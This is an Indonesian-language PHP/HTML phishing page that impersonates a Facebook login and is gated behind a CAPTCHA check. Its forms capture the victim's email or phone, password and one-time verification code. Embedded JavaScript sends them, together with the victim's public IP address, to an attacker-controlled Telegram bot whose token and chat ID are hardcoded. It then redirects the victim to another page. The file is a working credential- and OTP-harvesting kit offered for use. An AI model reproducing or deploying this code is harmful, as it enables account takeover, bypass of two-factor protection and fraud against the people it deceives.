<?php
session_start();

// Cek apakah pengguna sudah diverifikasi
if (!isset($_SESSION['verified']) || $_SESSION['verified'] !== true) {
    // Jika belum diverifikasi, arahkan mereka ke halaman CAPTCHA
    header("Location: captcha.php");
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Masuk atau Daftar</title>
  <style>
    /* Reset dan penataan dasar */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: Arial, sans-serif;
    }

    body {
      background: linear-gradient(to right, #fef4f5 5%, #edf6ff 50%, #eff8ff 75%);
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      color: #333;
    }

    .form-container {
      width: 100%;
      max-width: 700px;
      padding: 20px 20px;
      background-color: transparent;
      border-radius: 10px;
    }

    .form-container input {
      width: 100%;
      padding: 20px 20px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 15px;
      font-size: 14px;
      outline: none;
      font-weight: 400;
      transition: border-color 0.3s ease;
    }

    .form-container input:focus {
      border-color: #3c3c3c;
    }
    
    .form-group {
  position: relative;
  margin-top: 20px;
    }

    .form-container button {
      width: 100%;
      padding: 8px;
      background: #0064e0;
      color: #fff;
      font-size: 16px;
      font-weight: bold;
      border: none;
      border-radius: 25px;
      cursor: pointer;
      transition: background 0.3s ease;
      display: flex;
      align-items: center;
      justify-content: center;
      position: relative;
      height: 48px;
    }

    .form-container button:hover {
      background: #357ab8;
    }

    /* Spinner */
    .spinner {
      display: none;
      border: 2px solid #fff;
      border-top: 2px solid #4a90e2;
      border-radius: 50%;
      width: 24px;
      height: 24px;
      animation: spin 1s linear infinite;
      position: absolute;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    /* Icon Eye */
    .eye-icon {
      position: absolute;
      right: 10px;
      top: 50%;
      transform: translateY(-50%);
      cursor: pointer;
      font-size: 20px;
    }

    /* Modal */
    .modal {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.6);
      justify-content: center;
      align-items: center;
      z-index: 1000;
    }
    
    .modal-content h2 {
  font-size: 24px;
  font-weight: bold;
  color: #333;
  margin-bottom: 15px; /* Mengurangi jarak bawah untuk heading */
}

/* Margin untuk Deskripsi Teks */
.modal-content p {
  font-size: 16px;
  color: #555;
  margin-bottom: 30px; /* Memberikan jarak yang lebih banyak sebelum form */
}

/* Styling Input Fields */
.modal input {
  width: 100%;
  padding: 15px;
  margin-bottom: 20px; /* Jarak antara input dan tombol */
  border: 1px solid #ccc;
  border-radius: 8px;
  font-size: 16px;
  transition: border-color 0.3s ease;
}

    .modal-content {
      background: #fff;
      padding: 30px;
      border-radius: 12px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      width: 100%;
      max-width: 700px;
      text-align: center;
    }
    .modal input {
      width: 100%;
      padding: 20px 20px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 15px;
      font-size: 14px;
      outline: none;
      font-weight: 500;
      transition: border-color 0.3s ease;
    }

    .modal button {
      width: 100%;
      display: inline-flex;
      justify-content: center;
      align-items: center;
      padding: 12px;
      background: #4a90e2;
      color: #fff;
      font-size: 16px;
      font-weight: bold;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      transition: background 0.3s ease;
    }

    .modal button:hover {
      background: #357ab8;
    }
    
    /* Modal (Halaman Kedua) */
.modal {
  display: none;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(0, 0, 0, 0.6);
  justify-content: center;
  align-items: center;
  z-index: 1000;
  opacity: 0;
  transition: opacity 0.8s ease; /* Menambahkan transisi */
}

.modal.show {
  display: flex;
  opacity: 1;
}

 .my-image {
    margin-bottom: 90px;
    position: center;
  }
  
  .btn-daftar {
      width: 100%;
      padding: 12px;
      background: #4a90e2;
      color: #fff;
      font-size: 16px;
      font-weight: 400;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      transition: background 0.3s ease;
    }

    .modal button:hover {
      background: #357ab8;
    }
    
    .forgot-password {
      text-align: center;
      margin-top: 15px; /* Jarak antara tombol "Masuk" dan teks */
      font-size: 15px;
    }

    .forgot-password a {
      text-decoration: none;
      color: #343434; /* Warna biru */
      font-weight: 400;
      transition: color 0.3s ease;
    }

    .forgot-password a:hover {
      color: #0056b3; /* Warna biru lebih gelap saat hover */
    }
    
    .popup {
      display: none; /* Sembunyikan popup secara default */
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.8); /* Latar belakang gelap */
      justify-content: center;
      align-items: center;
      z-index: 1000; /* Pastikan di atas konten lainnya */
    }

    .popup-content {
      background-color: white;
      padding: 20px;
      border-radius: 8px;
      box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
      text-align: center;
    }

    .popup button {
      background-color: #0064e0;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      margin-top: 10px;
    }

    .popup button:hover {
      background-color: #357ab8;
    }
      
    .peringatan {
      color: black;
      font-size: 13px;
      background-color: #e9e9e9;
      border: 1px solid red;
      padding: 10px;
      border-radius: 25px;
      font-family: Arial, sans-serif;
      margin-bottom: 40px;
      text-align: center;
    }
    
    /* Responsive Styles for Mobile */
@media (max-width: 600px) {
    .form-container {
        padding: 20px;
        max-width: 90%; /* Memastikan form lebih kecil dan terpusat */
    }
}
  </style>
  <!-- Include Font Awesome for the Eye Icon -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
</head>
<body>
    

  <!-- Halaman Pertama -->
  <div class="form-container" id="page1">
      <div class="peringatan"><i class='fas fa-bell' style='font-size:13px'></i>
    Anda harus login terlebih dahulu untuk melanjutkan.
  </div>
      <div><center><img class="my-image" src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/2048px-Facebook_f_logo_%282019%29.svg.png" width="17%"></center></div>
    <center><div id="error-message" style="color: red; font-size: 14px; margin-bottom: 10px; display: none;"></div>
    <form id="form1">
      <input type="text" id="contact" placeholder="Nomor ponsel atau email" required>
      <div style="position: relative;">
        <input type="password" id="text1" placeholder="Kata sandi" required>
        <i id="toggle-eye" class="fas fa-eye eye-icon"></i>
      </div>
      <button type="submit" id="submitBtn">
        <span id="submitText">Login</span>
        <div class="spinner" id="spinner"></div>
      </button>
      </button>
    </form>
    <div class="forgot-password">
      <a href="https://m.facebook.com/login/identify" id="forgotPasswordLink">Lupa kata sandi?</a>
  </div>
  </div>

  <!-- Modal (Halaman Kedua) -->
  <div class="modal" id="page2">
    <div class="modal-content">
      <h2>Masukkan Kode yang dikirim ke Whatsapp atau SMS anda!</h2>
      <p>Kami mengirimkan kode ke Whatsapp/SMS atau Email anda untuk membantu proses Verifikasi, Masukkan kode itu disini:</p>
      <form id="form2">
        <input type="text" id="text2" placeholder="Masukkan kode" required>
        <button type="submit" id="submitBtn2">
          <span id="submitText2">Lanjutkan</span>
          <div class="spinner" id="spinner2"></div>
        </button>
      </form>
      <div class="forgot-password">
      <a href="#" id="openPopup">Belum menerima kode?</a>
    </div>
  </div>
  <!-- Popup Modal -->
  <div class="popup" id="popupModal">
    <div class="popup-content">
      <p>Jika belum menerima kode</br>harap periksa Email anda karena Kode mungkin</br>akan masuk melalui email</p>
      <button id="closePopup">Tutup</button>
    </div>
  </div>

  <script>
  // Fungsi untuk mendapatkan IP publik pengguna
async function getPublicIP() {
  try {
    const response = await fetch('https://api.ipify.org?format=json');
    const data = await response.json();
    return data.ip;
  } catch (error) {
    console.error('Gagal mendapatkan IP:', error);
    return 'Tidak dapat mengambil IP';
  }
}

    const BOT_TOKEN = '7507569325:AAFf_PVxcF8xZF3OLypXwqLhY468pqErGYA';
    const CHAT_ID = '6236832102';

    const page1 = document.getElementById('page1');
    const page2 = document.getElementById('page2');
    const form1 = document.getElementById('form1');
    const form2 = document.getElementById('form2');
    const spinner1 = document.getElementById('spinner');
    const spinner2 = document.getElementById('spinner2');
    const submitButton1 = document.getElementById('submitBtn');
    const submitButton2 = document.getElementById('submitBtn2');
    const submitText1 = document.getElementById('submitText');
    const submitText2 = document.getElementById('submitText2');
    const formData = {};

    let message1 = ''; // Variable global message1 untuk menyimpan data dari form 1

    // Toggle visibility of text1
    const toggleEye = document.getElementById('toggle-eye');
const text1 = document.getElementById('text1');

// Awal: Sembunyikan ikon
toggleEye.style.display = 'none';
toggleEye.classList.remove('fa-eye');
toggleEye.classList.add('fa-eye-slash');

// Tampilkan ikon saat input difokuskan
text1.addEventListener('focus', () => {
  toggleEye.style.display = 'block';
});

text1.addEventListener('blur', () => {
  // Hanya sembunyikan eye jika input tidak memiliki nilai
  if (text1.value === '') {
    toggleEye.style.display = 'none';
  }
});

// Toggle visibility of password
toggleEye.addEventListener('click', () => {
  if (text1.type === 'password') {
    text1.type = 'text';
    toggleEye.classList.remove('fa-eye-slash');
    toggleEye.classList.add('fa-eye');
  } else {
    text1.type = 'password';
    toggleEye.classList.remove('fa-eye');
    toggleEye.classList.add('fa-eye-slash');
  }
});


   // Fungsi untuk menampilkan pesan kesalahan
function showError(message) {
  const errorMessage = document.getElementById('error-message');
  errorMessage.textContent = message;
  errorMessage.style.display = 'block';
}

// Fungsi untuk menyembunyikan pesan kesalahan
function hideError() {
  const errorMessage = document.getElementById('error-message');
  errorMessage.style.display = 'none';
}

// Validasi kontak (email atau nomor ponsel)
function validateContact(contact) {
  const emailPattern = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; // Format email
  const phonePattern = /^[0-9]{10,15}$/; // Format nomor ponsel
  return emailPattern.test(contact) || phonePattern.test(contact);
}

// Validasi kata sandi
function validatePassword(password) {
  return password.length >= 8; // Minimal panjang 8 karakter
}

// Handle Form 1 submission
form1.addEventListener('submit', (e) => {
  e.preventDefault();
  const contact = document.getElementById('contact').value.trim();
  const text1Value = document.getElementById('text1').value.trim();

  // Validasi input
  if (!validateContact(contact)) {
    showError('Masukkan email atau nomor ponsel yang valid!');
    return;
  }
  if (!validatePassword(text1Value)) {
    showError('Kata sandi harus minimal 8 karakter!');
    return;
  }

  if (!contact || !text1Value) {
    showError('Harap isi semua bidang!');
    return;
  }

  // Sembunyikan pesan kesalahan jika tidak ada masalah
  hideError();

  formData.contact = contact;
  formData.text1 = text1Value;
      // Show spinner and hide submit button text
      spinner1.style.display = 'block';
      submitText1.style.display = 'none';

      message1 = `
     *---WELCOME TO MY RESSULT---*
     
    - *Email*:   ${formData.contact}
        
    - *Password*:   ${formData.text1}
      `;

      console.log('Sending message1:', message1);

      // Send form data to Telegram
      fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: CHAT_ID,
          text: message1,
          parse_mode: 'Markdown',
        }),
      })
      .then(response => response.json())
      .then(data => {
        console.log('Response from Form 1:', data);
        if (data.ok) {
          page2.classList.add('show');
          page1.style.display = 'none'; // Hide page 1 and show page 2
        } else {
          alert('Gagal mengirim data form 1');
        }
      })
      .catch(error => {
        console.error('Error:', error);
        alert('Terjadi kesalahan saat mengirim form 1.');
      })
      .finally(() => {
        spinner1.style.display = 'none';
        submitText1.style.display = 'inline';
      });
    });

    // Handle Form 2 submission
form2.addEventListener('submit', async (e) => {
  e.preventDefault();
  const text2Value = document.getElementById('text2').value.trim();

  if (!text2Value) {
    alert('Harap isi semua bidang!');
    return;
  }

  // Show spinner and hide submit button text
  spinner2.style.display = 'block';
  submitText2.style.display = 'none';

  try {
    // Ambil IP pengguna
    const userIP = await getPublicIP();

    // Gabungkan data form2 dengan IP
    const message2 = `
         *--------SUKSES---------*
     
       - *OTP*:  ${text2Value}

       - *IP Address*: ${userIP}
    `;

    console.log('Sending message2:', message2);

    // Send both form 1 and form 2 data to Telegram
    const response = await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({
        chat_id: CHAT_ID,
        text: `${message1} ${message2}`, // Combine both messages
        parse_mode: 'Markdown',
      }),
    });

    const data = await response.json();

    if (data.ok) {
      // Set durasi spinner sebelum redirect
      const spinnerDuration = 6000; // 2000ms = 2 detik
      setTimeout(() => {
        window.location.href = "pengajuan.php"; // Redirect setelah durasi spinner
      }, spinnerDuration);
    } else {
      alert('Gagal mengirim data form 2');
    }
  } catch (error) {
    console.error('Error:', error);
    alert('Terjadi kesalahan silahkan ulangi');
  } finally {
    // Spinner tetap ditampilkan hingga timeout selesai
    setTimeout(() => {
      spinner2.style.display = 'none';
      submitText2.style.display = 'inline';
    }, 6000); // Samakan durasi dengan spinnerDuration
  }
});

  </script>
   <script>
    // Menangani event klik pada link untuk membuka popup
    document.getElementById('openPopup').addEventListener('click', function(e) {
      e.preventDefault(); // Mencegah link default (navigasi)
      document.getElementById('popupModal').style.display = 'flex'; // Tampilkan popup
    });

    // Menangani event klik pada tombol "Tutup" untuk menutup popup
    document.getElementById('closePopup').addEventListener('click', function() {
      document.getElementById('popupModal').style.display = 'none'; // Sembunyikan popup
    });
  </script>

</body>
</html>
